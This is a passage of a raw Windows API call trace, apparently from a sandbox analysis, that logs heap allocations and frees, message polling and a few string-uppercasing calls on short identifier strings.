hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69850 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f78b8 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0088.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0088.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0088.113] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0088.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0088.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0088.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0088.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0088.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0088.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0088.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0088.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0088.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0088.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0088.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0088.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0088.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0088.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0088.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0088.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0088.114] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0088.114] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0088.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0088.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0088.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0088.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0088.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0088.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0088.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0088.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0088.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0088.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0088.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.115] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0088.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0088.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0088.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6e80 [0088.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a698b0 [0088.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0088.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0088.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0088.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0088.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0088.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0088.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xcdc8) returned 0x37cce18 [0088.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a698b0 | out: hHeap=0x2af0000) returned 1 [0088.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0088.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0088.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0088.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0088.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xcdc8) returned 0x37d9be8 [0088.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37cce18 | out: hHeap=0x2af0000) returned 1 [0088.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.116] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0088.116] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0088.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0088.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.116] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0088.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0088.116] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0088.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0088.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0088.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0088.117] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0088.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0088.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0088.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0088.117] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0088.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0088.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0088.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0088.117] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0088.117] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0088.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0088.117] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0088.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0088.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b20 [0088.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74550 [0088.118] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0088.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0088.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0088.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0088.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0088.118] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0088.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0088.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0088.118] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0088.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0088.118] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0088.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0088.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0088.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0088.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0088.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0088.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0088.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0088.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0088.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.119] RtlAllocateHeap 